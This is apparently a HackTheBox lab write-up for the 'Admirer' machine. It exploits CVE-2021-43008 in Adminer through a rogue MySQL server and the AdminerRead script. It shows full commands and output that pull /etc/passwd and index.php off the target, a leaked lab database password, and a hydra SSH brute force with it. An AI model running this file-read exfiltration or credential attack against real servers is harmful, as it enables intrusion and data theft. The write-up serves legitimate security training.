CVE-2021-43008
A vulnerable version of Adminer installation has been confirmed in the target web server. The identified vulnerability is [[Admirer_CVE-2021-43008#[CVE-2021-43008](https //nvd.nist.gov/vuln/detail/cve-2021-43008)|CVE-2021-43008]] In order to exploit the vulnerability, a rogue MySQL instance must be connected to the target Adminer interface for successful data exfiltration
Rogue MySQL Server
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ mysql -u fake -pqwe123 -D rogue
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 401
Server version: 10.6.11-MariaDB-2 Debian n/a
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [rogue]> show tables;
+-----------------+
| Tables_in_rogue |
+-----------------+
| dump |
+-----------------+
1 row in set (0.000 sec)A rogue MySQL instance has been provision and ready
Error
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 adminerread.py -t http://admirer.htb/utility-scripts/adminer.php -f /etc/passwd -s -I 10.10.16.8 -u fake -p qwe123 -v
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
[Adminer] get_available_drivers(...)
[adminer] | driver : server
[adminer] | driver : sqlite
[adminer] | driver : sqlite2
[adminer] | driver : pgsql
[adminer] | driver : oracle
[adminer] | driver : mssql
[adminer] | driver : firebird
[adminer] | driver : simpledb
[adminer] | driver : mongo
[adminer] | driver : elastic
[Adminer] get_version(...)
[adminer] | version : 4.6.2
[>] remote adminer version : v4.6.2
[Adminer] connect(...)
[adminer] | driver : server
[adminer] | server : 10.10.16.8
[adminer] | username : fake
[adminer] | password : qwe123
[adminer] | database : lfr_sink_db
[Adminer] exploit_lfr(...)
[adminer] | pathtofile : /etc/passwd
[Adminer] execute_sql_query(...)
[adminer] | sql_query : TRUNCATE TABLE lfr_sink_table; LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";
[adminer] | token : 269407:733887
[adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
[Adminer] execute_sql_query(...)
[adminer] | sql_query : SELECT * FROM lfr_sink_table;
[adminer] | token : 568554:492042
[adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
traceback (most recent call last):
File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 325, in <module>
dump_file(adminer, options.dump_dir, options.file, only_success=options.only_success)
File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 278, in dump_file
file = adminer.exploit_lfr(filepath, table)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/archive/htb/labs/admirer/CVE-2021-43008/AdminerRead.py", line 175, in exploit_lfr
results = self.execute_sql_query("SELECT * FROM lfr_sink_table;")['results'][0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
indexerror: list index out of rangeThe exploit script initially fails
Looking further into the [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https //github.com/p0dalirius/CVE-2021-43008-AdminerRead))|script]], I found the cause of failure
The [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https //github.com/p0dalirius/CVE-2021-43008-AdminerRead))|script]] had a pre-defined table and database; lfr_sink_table and lfr_sink_db
It was trying to connect to that. That’s why it failed.
I will change the values to match my instance
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 AdminerRead.py -t http://admirer.htb/utility-scripts/adminer.php -F wordlists/all -s -I 10.10.16.8 -u fake -p qwe123
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
[>] Remote Adminer version : v4.6.2
Working... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:04:47After addressing the issue earlier above, the [[Admirer_CVE-2021-43008#Exploit ([AdminerRead](https //github.com/p0dalirius/CVE-2021-43008-AdminerRead))|exploit script]] seems to be running just fine.
Yet, it doesn’t bring out any result with the use of default wordlist; -F wordlist/all
The script also support supplying individual filename with the -f flag.
I will try that
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ python3 AdminerRead.py -t http://admirer.htb/utility-scripts/adminer.php -f /var/www/html/index.php -s -I 10.10.16.8 -u fake -p qwe123 -v
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
[Adminer] get_available_drivers(...)
[Adminer] | driver : server
[Adminer] | driver : sqlite
[Adminer] | driver : sqlite2
[Adminer] | driver : pgsql
[Adminer] | driver : oracle
[Adminer] | driver : mssql
[Adminer] | driver : firebird
[Adminer] | driver : simpledb
[Adminer] | driver : mongo
[Adminer] | driver : elastic
[Adminer] get_version(...)
[Adminer] | version : 4.6.2
[>] Remote Adminer version : v4.6.2
[Adminer] connect(...)
[Adminer] | driver : server
[Adminer] | server : 10.10.16.8
[Adminer] | username : fake
[Adminer] | password : qwe123
[Adminer] | database : rogue
[Adminer] exploit_lfr(...)
[Adminer] | pathtofile : /var/www/html/index.php
[Adminer] execute_sql_query(...)
[Adminer] | sql_query : TRUNCATE TABLE dump; LOAD DATA local INFILE '/var/www/html/index.php' INTO TABLE dump fields TERMINATED BY "\n";
[Adminer] | token : 709802:222890
[Adminer] {'results': [], 'messages': [], 'errors': [], 'success': True}
[Adminer] execute_sql_query(...)
[Adminer] | sql_query : SELECT * FROM dump;
[Adminer] | token : 803256:390072
[Adminer] {"num_rows": 123, "fields": ["data"], "values": {"data": ["<!DOCTYPE HTML>", "<!--", "\tMultiverse by HTML5 UP", "\thtml5up.net | @ajlkn", "\tFree for personal and commercial use under the CCA 3.0 license (html5up.net/license)", "-->", "<html>", "\t<head>", "\t\t<title>Admirer</title>", "\t\t<meta charset=\"utf-8\" />", "\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\" />", "\t\t<link rel=\"stylesheet\" href=\"assets/css/main.css\" />", "\t\t<noscript><link rel=\"stylesheet\" href=\"assets/css/noscript.css\" /></noscript>", "\t</head>", "\t<body class=\"is-preload\">", "\u00a0", "\t\t<!-- Wrapper -->", "\t\t\t<div id=\"wrapper\">", "\u00a0", "\t\t\t\t<!-- Header -->", "\t\t\t\t\t<header id=\"header\">", "\t\t\t\t\t\t<h1><a href=\"index.html\"><strong>Admirer</strong> of skills and visuals</a></h1>", "\t\t\t\t\t\t<nav>", "\t\t\t\t\t\t\t<ul>", "\t\t\t\t\t\t\t\t<li><a href=\"#footer\" class=\"icon solid fa-info-circle\">About</a></li>", "\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t</nav>", "\t\t\t\t\t</header>", "\u00a0", "\t\t\t\t<!-- Main -->", "\t\t\t\t\t<div id=\"main\">\t\t\t", "\t\t\t\t\t <?php", " $servername = \"localhost\";", " $username = \"waldo\";", " $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";", " $dbname = \"admirerdb\";", "\u00a0", " // Create connection", " $conn = new mysqli($servername, $username, $password, $dbname);", " // Check connection", " if ($conn->connect_error) {", " die(\"Connection failed: \" . $conn->connect_error);", " }", "\u00a0", " $sql = \"SELECT * FROM items\";", " $result = $conn->query($sql);", "\u00a0", " if ($result->num_rows > 0) {", " // output data of each row", " while($row = $result->fetch_assoc()) {", " echo \"<article class='thumb'>\n\";", " \t\t\t\t\t\t\techo \"<a href='\".$row[\"image_path\"].\"' class='image'><img src='\".$row[\"thumb_path\"].\"' alt='' /></a>\n\";", "\t \t\t\t\t\t\techo \"<h2>\".$row[\"title\"].\"</h2>\n\";", "\t \t\t\t\t\t\techo \"<p>\".$row[\"text\"].\"</p>\n\";", "\t \t\t\t\t\t echo \"</article>\n\";", " }", " } else {", " echo \"0 results\";", " }", " $conn->close();", " ?>", "\t\t\t\t\t</div>", "\u00a0", "\t\t\t\t<!-- Footer -->", "\t\t\t\t\t<footer id=\"footer\" class=\"panel\">", "\t\t\t\t\t\t<div class=\"inner split\">", "\t\t\t\t\t\t\t<div>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Allow yourself to be amazed</h2>", "\t\t\t\t\t\t\t\t\t<p>Skills are not to be envied, but to feel inspired by.<br>", "\t\t\t\t\t\t\t\t\tVisual arts and music are there to take care of your soul.<br><br>", "\t\t\t\t\t\t\t\t\tLet your senses soak up these wonders...<br><br><br><br>", "\t\t\t\t\t\t\t\t\t</p>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Follow me on ...</h2>", "\t\t\t\t\t\t\t\t\t<ul class=\"icons\">", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-twitter\"><span class=\"label\">Twitter</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-facebook-f\"><span class=\"label\">Facebook</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-instagram\"><span class=\"label\">Instagram</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-github\"><span class=\"label\">GitHub</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-dribbble\"><span class=\"label\">Dribbble</span></a></li>", "\t\t\t\t\t\t\t\t\t\t<li><a href=\"#\" class=\"icon brands fa-linkedin-in\"><span class=\"label\">LinkedIn</span></a></li>", "\t\t\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t<div>", "\t\t\t\t\t\t\t\t<section>", "\t\t\t\t\t\t\t\t\t<h2>Get in touch</h2>", "\t\t\t\t\t\t\t\t\t<form method=\"post\" action=\"#\"><!-- Still under development... This does not send anything yet, but it looks nice! -->", "\t\t\t\t\t\t\t\t\t\t<div class=\"fields\">", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field half\">", "\t\t\t\t\t\t\t\t\t\t\t\t<input type=\"text\" name=\"name\" id=\"name\" placeholder=\"Name\" />", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field half\">", "\t\t\t\t\t\t\t\t\t\t\t\t<input type=\"text\" name=\"email\" id=\"email\" placeholder=\"Email\" />", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t\t<div class=\"field\">", "\t\t\t\t\t\t\t\t\t\t\t\t<textarea name=\"message\" id=\"message\" rows=\"4\" placeholder=\"Message\"></textarea>", "\t\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t\t\t\t\t<ul class=\"actions\">", "\t\t\t\t\t\t\t\t\t\t\t<li><input type=\"submit\" value=\"Send\" class=\"primary\" /></li>", "\t\t\t\t\t\t\t\t\t\t\t<li><input type=\"reset\" value=\"Reset\" /></li>", "\t\t\t\t\t\t\t\t\t\t</ul>", "\t\t\t\t\t\t\t\t\t</form>", "\t\t\t\t\t\t\t\t</section>", "\t\t\t\t\t\t\t</div>", "\t\t\t\t\t\t</div>", "\t\t\t\t\t</footer>", "\u00a0", "\t\t\t</div>", "\u00a0", "\t\t<!-- Scripts -->", "\t\t\t<script src=\"assets/js/jquery.min.js\"></script>", "\t\t\t<script src=\"assets/js/jquery.poptrox.min.js\"></script>", "\t\t\t<script src=\"assets/js/browser.min.js\"></script>", "\t\t\t<script src=\"assets/js/breakpoints.min.js\"></script>", "\t\t\t<script src=\"assets/js/util.js\"></script>", "\t\t\t<script src=\"assets/js/main.js\"></script>", "\u00a0", "\t</body>", "</html>"]}}
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ data ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ <!DOCTYPE HTML> │
│ <!-- │
│ Multiverse by HTML5 UP │
│ html5up.net | @ajlkn │
│ Free for personal and commercial use under the CCA 3.0 license (html5up.net/license) │
│ --> │
│ <html> │
│ <head> │
│ <title>Admirer</title> │
│ <meta charset="utf-8" /> │
│ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" /> │
│ <link rel="stylesheet" href="assets/css/main.css" /> │
│ <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript> │
│ </head> │
│ <body class="is-preload"> │
│ │
│ <!-- Wrapper --> │
│ <div id="wrapper"> │
│ │
│ <!-- Header --> │
│ <header id="header"> │
│ <h1><a href="index.html"><strong>Admirer</strong> of skills and visua… │
│ <nav> │
│ <ul> │
│ <li><a href="#footer" class="icon solid fa-info-circl… │
│ </ul> │
│ </nav> │
│ </header> │
│ │
│ <!-- Main --> │
│ <div id="main"> │
│ <?php │
│ $servername = "localhost"; │
│ $username = "waldo"; │
│ $password = "&<h5b~yK3F#{PaPB&dA}{H>"; │
│ $dbname = "admirerdb"; │
│ │
│ // Create connection │
│ $conn = new mysqli($servername, $username, $password, $dbname); │
│ // Check connection │
│ if ($conn->connect_error) { │
│ die("Connection failed: " . $conn->connect_error); │
│ } │
│ │
│ $sql = "SELECT * FROM items"; │
│ $result = $conn->query($sql); │
│ │
│ if ($result->num_rows > 0) { │
│ // output data of each row │
│ while($row = $result->fetch_assoc()) { │
│ echo "<article class='thumb'> │
│ "; │
│ echo "<a href='".$row["image_path"]."' class='image'><img src… │
│ "; │
│ echo "<h2>".$row["title"]."</h2> │
│ "; │
│ echo "<p>".$row["text"]."</p> │
│ "; │
│ echo "</article> │
│ "; │
│ } │
│ } else { │
│ echo "0 results"; │
│ } │
│ $conn->close(); │
│ ?> │
│ </div> │
│ │
│ <!-- Footer --> │
│ <footer id="footer" class="panel"> │
│ <div class="inner split"> │
│ <div> │
│ <section> │
│ <h2>Allow yourself to be amazed</h2> │
│ <p>Skills are not to be envied, but to feel i… │
│ Visual arts and music are there to take care … │
│ Let your senses soak up these wonders...<br><… │
│ </p> │
│ </section> │
│ <section> │
│ <h2>Follow me on ...</h2> │
│ <ul class="icons"> │
│ <li><a href="#" class="icon brands fa… │
│ <li><a href="#" class="icon brands fa… │
│ <li><a href="#" class="icon brands fa… │
│ <li><a href="#" class="icon brands fa… │
│ <li><a href="#" class="icon brands fa… │
│ <li><a href="#" class="icon brands fa… │
│ </ul> │
│ </section> │
│ </div> │
│ <div> │
│ <section> │
│ <h2>Get in touch</h2> │
│ <form method="post" action="#"><!-- Still und… │
│ <div class="fields"> │
│ <div class="field half"> │
│ <input type="text" na… │
│ </div> │
│ <div class="field half"> │
│ <input type="text" na… │
│ </div> │
│ <div class="field"> │
│ <textarea name="messa… │
│ </div> │
│ </div> │
│ <ul class="actions"> │
│ <li><input type="submit" valu… │
│ <li><input type="reset" value… │
│ </ul> │
│ </form> │
│ </section> │
│ </div> │
│ </div> │
│ </footer> │
│ │
│ </div> │
│ │
│ <!-- Scripts --> │
│ <script src="assets/js/jquery.min.js"></script> │
│ <script src="assets/js/jquery.poptrox.min.js"></script> │
│ <script src="assets/js/browser.min.js"></script> │
│ <script src="assets/js/breakpoints.min.js"></script> │
│ <script src="assets/js/util.js"></script> │
│ <script src="assets/js/main.js"></script> │
│ │
│ </body> │
│ </html> │
└────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘
[Adminer] {"num_rows": 1, "fields": ["id?", "select_type?", "table?", "partitions?", "type?", "possible_keys?", "key?", "key_len?", "ref?", "rows?", "Extra?"], "values": {"id?": ["1"], "select_type?": ["SIMPLE"], "table?": ["dump"], "partitions?": ["NULL"], "type?": ["ALL"], "possible_keys?": ["NULL"], "key?": ["NULL"], "key_len?": ["NULL"], "ref?": ["NULL"], "rows?": ["123"], "Extra?": ["\u00a0"]}}
┏━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━┳━━━━━━━━┓
┃ id? ┃ select_type? ┃ table? ┃ partitions? ┃ type? ┃ possible_keys? ┃ key? ┃ key_len? ┃ ref? ┃ rows? ┃ Extra? ┃
┡━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━╇━━━━━━━━┩
│ 1 │ SIMPLE │ dump │ NULL │ ALL │ NULL │ NULL │ NULL │ NULL │ 123 │ │
└─────┴──────────────┴────────┴─────────────┴───────┴────────────────┴──────┴──────────┴──────┴───────┴────────┘
[Adminer] {'results': [{'num_rows': 123, 'fields': ['data'], 'values': {'data': ['<!DOCTYPE HTML>', '<!--', '\tMultiverse by HTML5 UP', '\thtml5up.net | @ajlkn', '\tFree for personal and commercial use under the CCA 3.0 license (html5up.net/license)', '-->', '<html>', '\t<head>', '\t\t<title>Admirer</title>', '\t\t<meta charset="utf-8" />', '\t\t<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />', '\t\t<link rel="stylesheet" href="assets/css/main.css" />', '\t\t<noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>', '\t</head>', '\t<body class="is-preload">', '\xa0', '\t\t<!-- Wrapper -->', '\t\t\t<div id="wrapper">', '\xa0', '\t\t\t\t<!-- Header -->', '\t\t\t\t\t<header id="header">', '\t\t\t\t\t\t<h1><a href="index.html"><strong>Admirer</strong> of skills and visuals</a></h1>', '\t\t\t\t\t\t<nav>', '\t\t\t\t\t\t\t<ul>', '\t\t\t\t\t\t\t\t<li><a href="#footer" class="icon solid fa-info-circle">About</a></li>', '\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t</nav>', '\t\t\t\t\t</header>', '\xa0', '\t\t\t\t<!-- Main -->', '\t\t\t\t\t<div id="main">\t\t\t', '\t\t\t\t\t <?php', ' $servername = "localhost";', ' $username = "waldo";', ' $password = "&<h5b~yK3F#{PaPB&dA}{H>";', ' $dbname = "admirerdb";', '\xa0', ' // Create connection', ' $conn = new mysqli($servername, $username, $password, $dbname);', ' // Check connection', ' if ($conn->connect_error) {', ' die("Connection failed: " . $conn->connect_error);', ' }', '\xa0', ' $sql = "SELECT * FROM items";', ' $result = $conn->query($sql);', '\xa0', ' if ($result->num_rows > 0) {', ' // output data of each row', ' while($row = $result->fetch_assoc()) {', ' echo "<article class=\'thumb\'>\n";', ' \t\t\t\t\t\t\techo "<a href=\'".$row["image_path"]."\' class=\'image\'><img src=\'".$row["thumb_path"]."\' alt=\'\' /></a>\n";', '\t \t\t\t\t\t\techo "<h2>".$row["title"]."</h2>\n";', '\t \t\t\t\t\t\techo "<p>".$row["text"]."</p>\n";', '\t \t\t\t\t\t echo "</article>\n";', ' }', ' } else {', ' echo "0 results";', ' }', ' $conn->close();', ' ?>', '\t\t\t\t\t</div>', '\xa0', '\t\t\t\t<!-- Footer -->', '\t\t\t\t\t<footer id="footer" class="panel">', '\t\t\t\t\t\t<div class="inner split">', '\t\t\t\t\t\t\t<div>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Allow yourself to be amazed</h2>', '\t\t\t\t\t\t\t\t\t<p>Skills are not to be envied, but to feel inspired by.<br>', '\t\t\t\t\t\t\t\t\tVisual arts and music are there to take care of your soul.<br><br>', '\t\t\t\t\t\t\t\t\tLet your senses soak up these wonders...<br><br><br><br>', '\t\t\t\t\t\t\t\t\t</p>', '\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Follow me on ...</h2>', '\t\t\t\t\t\t\t\t\t<ul class="icons">', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-twitter"><span class="label">Twitter</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-facebook-f"><span class="label">Facebook</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-instagram"><span class="label">Instagram</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-github"><span class="label">GitHub</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-dribbble"><span class="label">Dribbble</span></a></li>', '\t\t\t\t\t\t\t\t\t\t<li><a href="#" class="icon brands fa-linkedin-in"><span class="label">LinkedIn</span></a></li>', '\t\t\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t<div>', '\t\t\t\t\t\t\t\t<section>', '\t\t\t\t\t\t\t\t\t<h2>Get in touch</h2>', '\t\t\t\t\t\t\t\t\t<form method="post" action="#"><!-- Still under development... This does not send anything yet, but it looks nice! -->', '\t\t\t\t\t\t\t\t\t\t<div class="fields">', '\t\t\t\t\t\t\t\t\t\t\t<div class="field half">', '\t\t\t\t\t\t\t\t\t\t\t\t<input type="text" name="name" id="name" placeholder="Name" />', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t\t<div class="field half">', '\t\t\t\t\t\t\t\t\t\t\t\t<input type="text" name="email" id="email" placeholder="Email" />', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t\t<div class="field">', '\t\t\t\t\t\t\t\t\t\t\t\t<textarea name="message" id="message" rows="4" placeholder="Message"></textarea>', '\t\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t\t\t\t\t<ul class="actions">', '\t\t\t\t\t\t\t\t\t\t\t<li><input type="submit" value="Send" class="primary" /></li>', '\t\t\t\t\t\t\t\t\t\t\t<li><input type="reset" value="Reset" /></li>', '\t\t\t\t\t\t\t\t\t\t</ul>', '\t\t\t\t\t\t\t\t\t</form>', '\t\t\t\t\t\t\t\t</section>', '\t\t\t\t\t\t\t</div>', '\t\t\t\t\t\t</div>', '\t\t\t\t\t</footer>', '\xa0', '\t\t\t</div>', '\xa0', '\t\t<!-- Scripts -->', '\t\t\t<script src="assets/js/jquery.min.js"></script>', '\t\t\t<script src="assets/js/jquery.poptrox.min.js"></script>', '\t\t\t<script src="assets/js/browser.min.js"></script>', '\t\t\t<script src="assets/js/breakpoints.min.js"></script>', '\t\t\t<script src="assets/js/util.js"></script>', '\t\t\t<script src="assets/js/main.js"></script>', '\xa0', '\t</body>', '</html>']}}, {'num_rows': 1, 'fields': ['id?', 'select_type?', 'table?', 'partitions?', 'type?', 'possible_keys?', 'key?', 'key_len?', 'ref?', 'rows?', 'Extra?'], 'values': {'id?': ['1'], 'select_type?': ['SIMPLE'], 'table?': ['dump'], 'partitions?': ['NULL'], 'type?': ['ALL'], 'possible_keys?': ['NULL'], 'key?': ['NULL'], 'key_len?': ['NULL'], 'ref?': ['NULL'], 'rows?': ['123'], 'Extra?': ['\xa0']}}], 'messages': [], 'errors': [], 'success': True}
[+] ( 4.52 kB) /var/www/html/index.phpIt worked.
It pulled out the /var/www/html/index.php file from the target system
Interestingly, there is another CLEARTEXT DB credential hard-coded into the index.php file
The DB credential is waldo:&<h5b~yK3F#{PaPB&dA}{H>
I will append the newly found credential to the lists and attempt to find a valid credential by running a brute-force attack to the target SSH
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/admirer]
└─$ hydra -l users.txt -p passwords.txt ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-16 21:06:10
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 16 tasks per 1 server, overall 16 tasks, 119 login tries (l:17/p:7), ~8 tries per task
[data] attacking ssh://10.10.10.187:22/
[22][ssh] host: 10.10.10.187 login: waldo password: &<h5b~yK3F#{PaPB&dA}{H>The newly found credential is validated to the target SSH server
Manual
It can also be done manually from the Adminer interface over the target web server
Cleanup
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ sudo mysql -u root -p
enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 442
server version: 10.6.11-MariaDB-2 Debian n/a
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> DROP TABLE rogue.dump;
Query OK, 0 rows affected (0.003 sec)
MariaDB [(none)]> DROP DATABASE rogue;
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> DROP USER fake@'%';
Query OK, 0 rows affected (0.002 sec)Deleting DB, table, user
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ cat /etc/mysql/mariadb.conf.d/50-server.cnf | grep -i bind-address
bind-address = 127.0.0.1
┌──(kali㉿kali)-[~/…/htb/labs/admirer/CVE-2021-43008]
└─$ sudo service mysqld stop Back to localhost only & stopping the instance